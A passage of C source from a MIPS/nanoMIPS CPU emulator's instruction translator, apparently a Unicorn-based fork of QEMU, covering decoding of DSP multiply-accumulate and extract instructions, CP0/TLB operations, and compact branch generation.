switch (extract32(ctx->opcode, 12, 2)) { case NM_MFHI: gen_HILO(ctx, OPC_MFHI, v2 >> 3, ret); break; case NM_MFLO: gen_HILO(ctx, OPC_MFLO, v2 >> 3, ret); break; case NM_MTHI: gen_HILO(ctx, OPC_MTHI, v2 >> 3, v1); break; case NM_MTLO: gen_HILO(ctx, OPC_MTLO, v2 >> 3, v1); break; } break; case NM_POOL32AXF_1_1: check_dsp(ctx); switch (extract32(ctx->opcode, 12, 2)) { case NM_MTHLIP: tcg_gen_movi_tl(tcg_ctx, t0, v2); gen_helper_mthlip(tcg_ctx, t0, v0_t, tcg_ctx->cpu_env); break; case NM_SHILOV: tcg_gen_movi_tl(tcg_ctx, t0, v2 >> 3); gen_helper_shilo(tcg_ctx, t0, v0_t, tcg_ctx->cpu_env); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_POOL32AXF_1_3: check_dsp(ctx); imm = extract32(ctx->opcode, 14, 7); switch (extract32(ctx->opcode, 12, 2)) { case NM_RDDSP: tcg_gen_movi_tl(tcg_ctx, t0, imm); gen_helper_rddsp(tcg_ctx, t0, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, ret); break; case NM_WRDSP: gen_load_gpr(tcg_ctx, t0, ret); tcg_gen_movi_tl(tcg_ctx, t1, imm); gen_helper_wrdsp(tcg_ctx, t0, t1, tcg_ctx->cpu_env); break; case NM_EXTP: tcg_gen_movi_tl(tcg_ctx, t0, v2 >> 3); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_extp(tcg_ctx, t0, t0, t1, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, ret); break; case NM_EXTPDP: tcg_gen_movi_tl(tcg_ctx, t0, v2 >> 3); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_extpdp(tcg_ctx, t0, t0, t1, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, ret); break; } break; case NM_POOL32AXF_1_4: check_dsp(ctx); tcg_gen_movi_tl(tcg_ctx, t0, v2 >> 2); switch (extract32(ctx->opcode, 12, 1)) { case NM_SHLL_QB: gen_helper_shll_qb(tcg_ctx, t0, t0, v0_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, ret); break; case NM_SHRL_QB: gen_helper_shrl_qb(tcg_ctx, t0, t0, v0_t); gen_store_gpr(tcg_ctx, t0, ret); break; } break; case NM_POOL32AXF_1_5: opc = extract32(ctx->opcode, 12, 2); gen_pool32axf_1_5_nanomips_insn(ctx, opc, ret, v1, v2); break; case NM_POOL32AXF_1_7: check_dsp(ctx); tcg_gen_movi_tl(tcg_ctx, t0, v2 >> 3); tcg_gen_movi_tl(tcg_ctx, t1, v1); switch (extract32(ctx->opcode, 12, 2)) { case NM_EXTR_W: gen_helper_extr_w(tcg_ctx, t0, t0, t1, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, ret); break; case NM_EXTR_R_W: gen_helper_extr_r_w(tcg_ctx, t0, t0, t1, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, ret); break; case NM_EXTR_RS_W: gen_helper_extr_rs_w(tcg_ctx, t0, t0, t1, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, ret); break; case NM_EXTR_S_H: gen_helper_extr_s_h(tcg_ctx, t0, t0, t1, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, ret); break; } break; default: generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, v0_t); } static void gen_pool32axf_2_multiply(DisasContext *ctx, uint32_t opc, TCGv v0, TCGv v1, int rd) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0; t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_movi_i32(tcg_ctx, t0, rd >> 3); switch (opc) { case NM_POOL32AXF_2_0_7: switch (extract32(ctx->opcode, 9, 3)) { case NM_DPA_W_PH: check_dsp_r2(ctx); gen_helper_dpa_w_ph(tcg_ctx, t0, v1, v0, tcg_ctx->cpu_env); break; case NM_DPAQ_S_W_PH: check_dsp(ctx); gen_helper_dpaq_s_w_ph(tcg_ctx, t0, v1, v0, tcg_ctx->cpu_env); break; case NM_DPS_W_PH: check_dsp_r2(ctx); gen_helper_dps_w_ph(tcg_ctx, t0, v1, v0, tcg_ctx->cpu_env); break; case NM_DPSQ_S_W_PH: check_dsp(ctx); gen_helper_dpsq_s_w_ph(tcg_ctx, t0, v1, v0, tcg_ctx->cpu_env); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_POOL32AXF_2_8_15: switch (extract32(ctx->opcode, 9, 3)) { case NM_DPAX_W_PH: check_dsp_r2(ctx); gen_helper_dpax_w_ph(tcg_ctx, t0, v0, v1, tcg_ctx->cpu_env); break; case NM_DPAQ_SA_L_W: check_dsp(ctx); gen_helper_dpaq_sa_l_w(tcg_ctx, t0, v0, v1, tcg_ctx->cpu_env); break; case NM_DPSX_W_PH: check_dsp_r2(ctx); gen_helper_dpsx_w_ph(tcg_ctx, t0, v0, v1, tcg_ctx->cpu_env); break; case NM_DPSQ_SA_L_W: check_dsp(ctx); gen_helper_dpsq_sa_l_w(tcg_ctx, t0, v0, v1, tcg_ctx->cpu_env); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_POOL32AXF_2_16_23: switch (extract32(ctx->opcode, 9, 3)) { case NM_DPAU_H_QBL: check_dsp(ctx); gen_helper_dpau_h_qbl(tcg_ctx, t0, v0, v1, tcg_ctx->cpu_env); break; case NM_DPAQX_S_W_PH: check_dsp_r2(ctx); gen_helper_dpaqx_s_w_ph(tcg_ctx, t0, v0, v1, tcg_ctx->cpu_env); break; case NM_DPSU_H_QBL: check_dsp(ctx); gen_helper_dpsu_h_qbl(tcg_ctx, t0, v0, v1, tcg_ctx->cpu_env); break; case NM_DPSQX_S_W_PH: check_dsp_r2(ctx); gen_helper_dpsqx_s_w_ph(tcg_ctx, t0, v0, v1, tcg_ctx->cpu_env); break; case NM_MULSA_W_PH: check_dsp_r2(ctx); gen_helper_mulsa_w_ph(tcg_ctx, t0, v0, v1, tcg_ctx->cpu_env); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_POOL32AXF_2_24_31: switch (extract32(ctx->opcode, 9, 3)) { case NM_DPAU_H_QBR: check_dsp(ctx); gen_helper_dpau_h_qbr(tcg_ctx, t0, v1, v0, tcg_ctx->cpu_env); break; case NM_DPAQX_SA_W_PH: check_dsp_r2(ctx); gen_helper_dpaqx_sa_w_ph(tcg_ctx, t0, v1, v0, tcg_ctx->cpu_env); break; case NM_DPSU_H_QBR: check_dsp(ctx); gen_helper_dpsu_h_qbr(tcg_ctx, t0, v1, v0, tcg_ctx->cpu_env); break; case NM_DPSQX_SA_W_PH: check_dsp_r2(ctx); gen_helper_dpsqx_sa_w_ph(tcg_ctx, t0, v1, v0, tcg_ctx->cpu_env); break; case NM_MULSAQ_S_W_PH: check_dsp(ctx); gen_helper_mulsaq_s_w_ph(tcg_ctx, t0, v1, v0, tcg_ctx->cpu_env); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; default: generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free_i32(tcg_ctx, t0); } static void gen_pool32axf_2_nanomips_insn(DisasContext *ctx, uint32_t opc, int rt, int rs, int rd) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int ret = rt; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv v0_t = tcg_temp_new(tcg_ctx); TCGv v1_t = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, v0_t, rt); gen_load_gpr(tcg_ctx, v1_t, rs); switch (opc) { case NM_POOL32AXF_2_0_7: switch (extract32(ctx->opcode, 9, 3)) { case NM_DPA_W_PH: case NM_DPAQ_S_W_PH: case NM_DPS_W_PH: case NM_DPSQ_S_W_PH: gen_pool32axf_2_multiply(ctx, opc, v0_t, v1_t, rd); break; case NM_BALIGN: check_dsp_r2(ctx); if (rt != 0) { gen_load_gpr(tcg_ctx, t0, rs); rd &= 3; if (rd != 0 && rd != 2) { tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret], 8 * rd); tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_shri_tl(tcg_ctx, t0, t0, 8 * (4 - rd)); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret], t0); } tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret]); } break; case NM_MADD: check_dsp(ctx); { int acc = extract32(ctx->opcode, 14, 2); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rt); gen_load_gpr(tcg_ctx, t1, rs); tcg_gen_ext_tl_i64(tcg_ctx, t2, t0); tcg_gen_ext_tl_i64(tcg_ctx, t3, t1); tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); tcg_gen_concat_tl_i64(tcg_ctx, t3, tcg_ctx->cpu_LO[acc], tcg_ctx->cpu_HI[acc]); tcg_gen_add_i64(tcg_ctx, t2, t2, t3); tcg_temp_free_i64(tcg_ctx, t3); gen_move_low32(tcg_ctx, tcg_ctx->cpu_LO[acc], t2); gen_move_high32(tcg_ctx, tcg_ctx->cpu_HI[acc], t2); tcg_temp_free_i64(tcg_ctx, t2); } break; case NM_MULT: check_dsp(ctx); { int acc = extract32(ctx->opcode, 14, 2); TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); tcg_gen_muls2_i32(tcg_ctx, t2, t3, t2, t3); tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_LO[acc], t2); tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_HI[acc], t3); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); } break; case NM_EXTRV_W: check_dsp(ctx); gen_load_gpr(tcg_ctx, v1_t, rs); tcg_gen_movi_tl(tcg_ctx, t0, rd >> 3); gen_helper_extr_w(tcg_ctx, t0, t0, v1_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, ret); break; } break; case NM_POOL32AXF_2_8_15: switch (extract32(ctx->opcode, 9, 3)) { case NM_DPAX_W_PH: case NM_DPAQ_SA_L_W: case NM_DPSX_W_PH: case NM_DPSQ_SA_L_W: gen_pool32axf_2_multiply(ctx, opc, v0_t, v1_t, rd); break; case NM_MADDU: check_dsp(ctx); { int acc = extract32(ctx->opcode, 14, 2); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_ext32u_tl(tcg_ctx, t1, t1); tcg_gen_extu_tl_i64(tcg_ctx, t2, t0); tcg_gen_extu_tl_i64(tcg_ctx, t3, t1); tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); tcg_gen_concat_tl_i64(tcg_ctx, t3, tcg_ctx->cpu_LO[acc], tcg_ctx->cpu_HI[acc]); tcg_gen_add_i64(tcg_ctx, t2, t2, t3); tcg_temp_free_i64(tcg_ctx, t3); gen_move_low32(tcg_ctx, tcg_ctx->cpu_LO[acc], t2); gen_move_high32(tcg_ctx, tcg_ctx->cpu_HI[acc], t2); tcg_temp_free_i64(tcg_ctx, t2); } break; case NM_MULTU: check_dsp(ctx); { int acc = extract32(ctx->opcode, 14, 2); TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); tcg_gen_mulu2_i32(tcg_ctx, t2, t3, t2, t3); tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_LO[acc], t2); tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_HI[acc], t3); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); } break; case NM_EXTRV_R_W: check_dsp(ctx); tcg_gen_movi_tl(tcg_ctx, t0, rd >> 3); gen_helper_extr_r_w(tcg_ctx, t0, t0, v1_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, ret); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_POOL32AXF_2_16_23: switch (extract32(ctx->opcode, 9, 3)) { case NM_DPAU_H_QBL: case NM_DPAQX_S_W_PH: case NM_DPSU_H_QBL: case NM_DPSQX_S_W_PH: case NM_MULSA_W_PH: gen_pool32axf_2_multiply(ctx, opc, v0_t, v1_t, rd); break; case NM_EXTPV: check_dsp(ctx); tcg_gen_movi_tl(tcg_ctx, t0, rd >> 3); gen_helper_extp(tcg_ctx, t0, t0, v1_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, ret); break; case NM_MSUB: check_dsp(ctx); { int acc = extract32(ctx->opcode, 14, 2); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); tcg_gen_ext_tl_i64(tcg_ctx, t2, t0); tcg_gen_ext_tl_i64(tcg_ctx, t3, t1); tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); tcg_gen_concat_tl_i64(tcg_ctx, t3, tcg_ctx->cpu_LO[acc], tcg_ctx->cpu_HI[acc]); tcg_gen_sub_i64(tcg_ctx, t2, t3, t2); tcg_temp_free_i64(tcg_ctx, t3); gen_move_low32(tcg_ctx, tcg_ctx->cpu_LO[acc], t2); gen_move_high32(tcg_ctx, tcg_ctx->cpu_HI[acc], t2); tcg_temp_free_i64(tcg_ctx, t2); } break; case NM_EXTRV_RS_W: check_dsp(ctx); tcg_gen_movi_tl(tcg_ctx, t0, rd >> 3); gen_helper_extr_rs_w(tcg_ctx, t0, t0, v1_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, ret); break; } break; case NM_POOL32AXF_2_24_31: switch (extract32(ctx->opcode, 9, 3)) { case NM_DPAU_H_QBR: case NM_DPAQX_SA_W_PH: case NM_DPSU_H_QBR: case NM_DPSQX_SA_W_PH: case NM_MULSAQ_S_W_PH: gen_pool32axf_2_multiply(ctx, opc, v0_t, v1_t, rd); break; case NM_EXTPDPV: check_dsp(ctx); tcg_gen_movi_tl(tcg_ctx, t0, rd >> 3); gen_helper_extpdp(tcg_ctx, t0, t0, v1_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, ret); break; case NM_MSUBU: check_dsp(ctx); { int acc = extract32(ctx->opcode, 14, 2); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_ext32u_tl(tcg_ctx, t1, t1); tcg_gen_extu_tl_i64(tcg_ctx, t2, t0); tcg_gen_extu_tl_i64(tcg_ctx, t3, t1); tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); tcg_gen_concat_tl_i64(tcg_ctx, t3, tcg_ctx->cpu_LO[acc], tcg_ctx->cpu_HI[acc]); tcg_gen_sub_i64(tcg_ctx, t2, t3, t2); tcg_temp_free_i64(tcg_ctx, t3); gen_move_low32(tcg_ctx, tcg_ctx->cpu_LO[acc], t2); gen_move_high32(tcg_ctx, tcg_ctx->cpu_HI[acc], t2); tcg_temp_free_i64(tcg_ctx, t2); } break; case NM_EXTRV_S_H: check_dsp(ctx); tcg_gen_movi_tl(tcg_ctx, t0, rd >> 3); gen_helper_extr_s_h(tcg_ctx, t0, t0, v0_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, ret); break; } break; default: generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, v0_t); tcg_temp_free(tcg_ctx, v1_t); } static void gen_pool32axf_4_nanomips_insn(DisasContext *ctx, uint32_t opc, int rt, int rs) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int ret = rt; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv v0_t = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, v0_t, rs); switch (opc) { case NM_ABSQ_S_QB: check_dsp_r2(ctx); gen_helper_absq_s_qb(tcg_ctx, v0_t, v0_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_ABSQ_S_PH: check_dsp(ctx); gen_helper_absq_s_ph(tcg_ctx, v0_t, v0_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_ABSQ_S_W: check_dsp(ctx); gen_helper_absq_s_w(tcg_ctx, v0_t, v0_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_PRECEQ_W_PHL: check_dsp(ctx); tcg_gen_andi_tl(tcg_ctx, v0_t, v0_t, 0xFFFF0000); tcg_gen_ext32s_tl(tcg_ctx, v0_t, v0_t); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_PRECEQ_W_PHR: check_dsp(ctx); tcg_gen_andi_tl(tcg_ctx, v0_t, v0_t, 0x0000FFFF); tcg_gen_shli_tl(tcg_ctx, v0_t, v0_t, 16); tcg_gen_ext32s_tl(tcg_ctx, v0_t, v0_t); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_PRECEQU_PH_QBL: check_dsp(ctx); gen_helper_precequ_ph_qbl(tcg_ctx, v0_t, v0_t); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_PRECEQU_PH_QBR: check_dsp(ctx); gen_helper_precequ_ph_qbr(tcg_ctx, v0_t, v0_t); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_PRECEQU_PH_QBLA: check_dsp(ctx); gen_helper_precequ_ph_qbla(tcg_ctx, v0_t, v0_t); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_PRECEQU_PH_QBRA: check_dsp(ctx); gen_helper_precequ_ph_qbra(tcg_ctx, v0_t, v0_t); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_PRECEU_PH_QBL: check_dsp(ctx); gen_helper_preceu_ph_qbl(tcg_ctx, v0_t, v0_t); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_PRECEU_PH_QBR: check_dsp(ctx); gen_helper_preceu_ph_qbr(tcg_ctx, v0_t, v0_t); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_PRECEU_PH_QBLA: check_dsp(ctx); gen_helper_preceu_ph_qbla(tcg_ctx, v0_t, v0_t); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_PRECEU_PH_QBRA: check_dsp(ctx); gen_helper_preceu_ph_qbra(tcg_ctx, v0_t, v0_t); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_REPLV_PH: check_dsp(ctx); tcg_gen_ext16u_tl(tcg_ctx, v0_t, v0_t); tcg_gen_shli_tl(tcg_ctx, t0, v0_t, 16); tcg_gen_or_tl(tcg_ctx, v0_t, v0_t, t0); tcg_gen_ext32s_tl(tcg_ctx, v0_t, v0_t); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_REPLV_QB: check_dsp(ctx); tcg_gen_ext8u_tl(tcg_ctx, v0_t, v0_t); tcg_gen_shli_tl(tcg_ctx, t0, v0_t, 8); tcg_gen_or_tl(tcg_ctx, v0_t, v0_t, t0); tcg_gen_shli_tl(tcg_ctx, t0, v0_t, 16); tcg_gen_or_tl(tcg_ctx, v0_t, v0_t, t0); tcg_gen_ext32s_tl(tcg_ctx, v0_t, v0_t); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_BITREV: check_dsp(ctx); gen_helper_bitrev(tcg_ctx, v0_t, v0_t); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_INSV: check_dsp(ctx); { TCGv tv0 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, tv0, rt); gen_helper_insv(tcg_ctx, v0_t, tcg_ctx->cpu_env, v0_t, tv0); gen_store_gpr(tcg_ctx, v0_t, ret); tcg_temp_free(tcg_ctx, tv0); } break; case NM_RADDU_W_QB: check_dsp(ctx); gen_helper_raddu_w_qb(tcg_ctx, v0_t, v0_t); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_BITSWAP: gen_bitswap(ctx, OPC_BITSWAP, ret, rs); break; case NM_CLO: check_nms(ctx); gen_cl(ctx, OPC_CLO, ret, rs); break; case NM_CLZ: check_nms(ctx); gen_cl(ctx, OPC_CLZ, ret, rs); break; case NM_WSBH: gen_bshfl(ctx, OPC_WSBH, ret, rs); break; default: generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free(tcg_ctx, v0_t); tcg_temp_free(tcg_ctx, t0); } static void gen_pool32axf_7_nanomips_insn(DisasContext *ctx, uint32_t opc, int rt, int rs, int rd) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv rs_t = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, rs_t, rs); switch (opc) { case NM_SHRA_R_QB: check_dsp_r2(ctx); tcg_gen_movi_tl(tcg_ctx, t0, rd >> 2); switch (extract32(ctx->opcode, 12, 1)) { case 0: /* NM_SHRA_QB */ gen_helper_shra_qb(tcg_ctx, t0, t0, rs_t); gen_store_gpr(tcg_ctx, t0, rt); break; case 1: /* NM_SHRA_R_QB */ gen_helper_shra_r_qb(tcg_ctx, t0, t0, rs_t); gen_store_gpr(tcg_ctx, t0, rt); break; } break; case NM_SHRL_PH: check_dsp_r2(ctx); tcg_gen_movi_tl(tcg_ctx, t0, rd >> 1); gen_helper_shrl_ph(tcg_ctx, t0, t0, rs_t); gen_store_gpr(tcg_ctx, t0, rt); break; case NM_REPL_QB: check_dsp(ctx); { int16_t imm; target_long result; imm = extract32(ctx->opcode, 13, 8); result = (uint32_t)imm << 24 | (uint32_t)imm << 16 | (uint32_t)imm << 8 | (uint32_t)imm; result = (int32_t)result; tcg_gen_movi_tl(tcg_ctx, t0, result); gen_store_gpr(tcg_ctx, t0, rt); } break; default: generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, rs_t); } static void gen_pool32axf_nanomips_insn(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rt = extract32(ctx->opcode, 21, 5); int rs = extract32(ctx->opcode, 16, 5); int rd = extract32(ctx->opcode, 11, 5); switch (extract32(ctx->opcode, 6, 3)) { case NM_POOL32AXF_1: { int32_t op1 = extract32(ctx->opcode, 9, 3); gen_pool32axf_1_nanomips_insn(ctx, op1, rt, rs, rd); } break; case NM_POOL32AXF_2: { int32_t op1 = extract32(ctx->opcode, 12, 2); gen_pool32axf_2_nanomips_insn(ctx, op1, rt, rs, rd); } break; case NM_POOL32AXF_4: { int32_t op1 = extract32(ctx->opcode, 9, 7); gen_pool32axf_4_nanomips_insn(ctx, op1, rt, rs); } break; case NM_POOL32AXF_5: switch (extract32(ctx->opcode, 9, 7)) { case NM_TLBP: gen_cp0(env, ctx, OPC_TLBP, 0, 0); break; case NM_TLBR: gen_cp0(env, ctx, OPC_TLBR, 0, 0); break; case NM_TLBWI: gen_cp0(env, ctx, OPC_TLBWI, 0, 0); break; case NM_TLBWR: gen_cp0(env, ctx, OPC_TLBWR, 0, 0); break; case NM_TLBINV: gen_cp0(env, ctx, OPC_TLBINV, 0, 0); break; case NM_TLBINVF: gen_cp0(env, ctx, OPC_TLBINVF, 0, 0); break; case NM_DI: check_cp0_enabled(ctx); { TCGv t0 = tcg_temp_new(tcg_ctx); save_cpu_state(ctx, 1); gen_helper_di(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; tcg_temp_free(tcg_ctx, t0); } break; case NM_EI: check_cp0_enabled(ctx); { TCGv t0 = tcg_temp_new(tcg_ctx); save_cpu_state(ctx, 1); gen_helper_ei(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; tcg_temp_free(tcg_ctx, t0); } break; case NM_RDPGPR: gen_load_srsgpr(tcg_ctx, rs, rt); break; case NM_WRPGPR: gen_store_srsgpr(tcg_ctx, rs, rt); break; case NM_WAIT: gen_cp0(env, ctx, OPC_WAIT, 0, 0); break; case NM_DERET: gen_cp0(env, ctx, OPC_DERET, 0, 0); break; case NM_ERETX: gen_cp0(env, ctx, OPC_ERET, 0, 0); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_POOL32AXF_7: { int32_t op1 = extract32(ctx->opcode, 9, 3); gen_pool32axf_7_nanomips_insn(ctx, op1, rt, rs, rd); } break; default: generate_exception_end(ctx, EXCP_RI); break; } } /* Immediate Value Compact Branches */ static void gen_compute_imm_branch(DisasContext *ctx, uint32_t opc, int rt, int32_t imm, int32_t offset) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGCond cond; int bcond_compute = 0; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rt); tcg_gen_movi_tl(tcg_ctx, t1, imm); ctx->btarget = addr_add(ctx, ctx->base.pc_next + 4, offset); /* Load needed operands and calculate btarget */ switch (opc) { case NM_BEQIC: if (rt == 0 && imm == 0) { /* Unconditional branch */ } else if (rt == 0 && imm != 0) { /* Treat as NOP */ goto out; } else { bcond_compute = 1; cond = TCG_COND_EQ; } break; case NM_BBEQZC: case NM_BBNEZC: check_nms(ctx); if (imm >= 32 && !(ctx->hflags & MIPS_HFLAG_64)) { generate_exception_end(ctx, EXCP_RI); goto out; } else if (rt == 0 && opc == NM_BBEQZC) { /* Unconditional branch */ } else if (rt == 0 && opc == NM_BBNEZC) { /* Treat as NOP */ goto out; } else { tcg_gen_shri_tl(tcg_ctx, t0, t0, imm); tcg_gen_andi_tl(tcg_ctx, t0, t0, 1); tcg_gen_movi_tl(tcg_ctx, t1, 0); bcond_compute = 1; if (opc == NM_BBEQZC) { cond = TCG_COND_EQ; } else { cond = TCG_COND_NE; } } break; case NM_BNEIC: if (rt == 0 && imm == 0) { /* Treat as NOP */ goto out; } else if (rt == 0 && imm != 0) { /* Unconditional branch */ } else { bcond_compute = 1; cond = TCG_COND_NE; } break; case NM_BGEIC: if (rt == 0 && imm == 0) { /* Unconditional branch */ } else { bcond_compute = 1; cond = TCG_COND_GE; } break; case NM_BLTIC: bcond_compute = 1; cond = TCG_COND_LT; break; case NM_BGEIUC: if (rt == 0 && imm == 0) { /* Unconditional branch */ } else { bcond_compute = 1; cond = TCG_COND_GEU; } break; case NM_BLTIUC: bcond_compute = 1; cond = TCG_COND_LTU; break; default: MIPS_INVAL("Immediate Value Compact branch"); generate_exception_end(ctx, EXCP_RI); goto out; } /* branch completion */ clear_branch_hflags(ctx); ctx->base.is_jmp = DISAS_NORETURN; if (bcond_compute == 0) { /* Uncoditional compact branch */ gen_goto_tb(ctx, 0, ctx->btarget); } else { /* Conditional compact branch */ TCGLabel *fs = gen_new_label(tcg_ctx); tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(cond), t0, t1, fs); gen_goto_tb(ctx, 1, ctx->btarget); gen_set_label(tcg_ctx, fs); gen_goto_tb(ctx, 0, ctx->base.pc_next + 4); } out: tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } /* P.BALRSC type nanoMIPS R6 branches: BALRSC and BRSC */ static void gen_compute_nanomips_pbalrsc_branch(DisasContext *ctx, int rs, int rt) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); /* load rs */ gen_load_gpr(tcg_ctx, t0, rs); /* link */ if (rt != 0) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], ctx->base.pc_next + 4); } /* calculate btarget */ tcg_gen_shli_tl(tcg_ctx, t0, t0, 1); tcg_gen_movi_tl(tcg_ctx, t1, ctx->base.pc_next + 4); gen_op_addr_add(ctx, tcg_ctx->btarget, t1, t0); /* branch completion */ clear_branch_hflags(ctx); ctx->base.is_jmp = DISAS_NORETURN; /* unconditional branch to register */ tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_pc, tcg_ctx->btarget); tcg_gen_lookup_and_goto_ptr(tcg_ctx); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } /* nanoMIPS Branches */ static void gen_compute_compact_branch_nm(DisasContext *ctx, 